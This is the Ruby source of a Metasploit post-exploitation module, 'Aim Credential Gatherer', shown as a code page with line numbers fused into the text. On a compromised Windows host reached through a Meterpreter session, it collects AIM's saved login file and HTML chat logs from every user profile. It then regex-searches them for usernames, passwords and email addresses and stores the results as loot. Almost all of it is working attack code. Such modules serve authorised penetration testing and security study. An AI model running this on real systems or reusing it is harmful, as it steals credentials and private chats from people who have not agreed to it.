Path: blob/master/modules/post/windows/gather/credentials/aim.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Windows::UserProfiles8include Msf::Post::Windows::Packrat9ARTIFACTS =10{11application: 'AIM',12app_category: 'chats',13gatherable_artifacts: [14{15filetypes: 'logins',16path: 'LocalAppData',17dir: 'AIM',18artifact_file_name: 'aimx.bin',19description: "AIM's saved Username and Passwords",20credential_type: 'text',21regex_search: [22{23extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',24extraction_type: 'credentials',25regex: [26'(?i-mx:password.*)',27'(?i-mx:username.*)'28]29},30{31extraction_description: 'searches for Email TO/FROM address',32extraction_type: 'Email addresses',33regex: [34'(?i-mx:to:.*)',35'(?i-mx:from:.*)'36]37}38]39},40{41filetypes: 'chat_logs',42path: 'LocalAppData',43dir: 'AIM',44artifact_file_name: '*.html',45description: "AIM's chat logs with date and times",46credential_type: 'text',47regex_search: [48{49extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',50extraction_type: 'credentials',51regex: [52'(?i-mx:password.*)',53'(?i-mx:username.*)'54]55},56{57extraction_description: 'searches for Email TO/FROM address',58extraction_type: 'Email addresses',59regex: [60'(?i-mx:to:.*)',61'(?i-mx:from:.*)'62]63}64]65}66]67}.freeze6869def initialize(info = {})70super(71update_info(72info,73'Name' => 'Aim Credential Gatherer',74'Description' => %q{75This module searches for Aim credentials on a Windows host.76},77'License' => MSF_LICENSE,78'Author' => [79'Kazuyoshi Maruta',80'Daniel Hallsworth',81'Barwar Salim M',82'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org83],84'Platform' => ['win'],85'SessionTypes' => ['meterpreter'],86'Notes' => {87'Stability' => [CRASH_SAFE],88'Reliability' => [],89'SideEffects' => []90}91)92)9394register_options(95[96OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),97OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),98OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),99# enumerates the options based on the artifacts that are defined below100OptEnum.new('ARTIFACTS', [101false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|102k[:filetypes]103end.uniq.unshift('All')104])105]106)107end108109def run110print_status('Filtering based on these selections: ')111print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")112print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")113print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")114115# used to grab files for each user on the remote host116grab_user_profiles.each do |userprofile|117run_packrat(userprofile, ARTIFACTS)118end119120print_status 'PackRat credential sweep completed'121end122end123124125